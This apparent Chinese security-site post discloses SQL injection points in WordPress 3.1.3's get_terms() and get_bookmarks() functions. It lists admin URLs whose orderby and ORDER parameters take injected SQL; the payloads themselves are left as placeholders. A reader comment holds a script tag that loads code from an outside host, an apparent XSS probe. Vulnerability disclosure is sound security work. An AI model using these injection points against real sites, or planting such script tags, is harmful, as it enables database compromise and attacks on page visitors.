WordPress 3.1.3 注射漏洞

By：paco

两个地方

第一个
get_terms（）过滤器文件中声明wp-includes/taxonomy.php 没有正确验证用户输入代码就不贴了

可用于盲注
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby = [SQL注射]＆ORDER = [SQL注入]

http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby = [SQL注射]＆ORDER = [SQL注入]

http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby = [SQL注射]＆ORDER = [SQL注入]

第二个

get_bookmarks（）函数中声明的

wp-includes/bookmark.php文件没有正确验证用户输入

这个也可以盲注
http://localhost/wp-admin/link-manager.php?orderby = [SQL注射]＆ORDER = [SQL注入]

让洞被插的更深些吧求洞求金币买洞

留言评论（旧系统）：

佚名 @ 2013-12-09 19:28:31

<script src=http://xss.re/618></script>

本站回复：

hi!

文章目录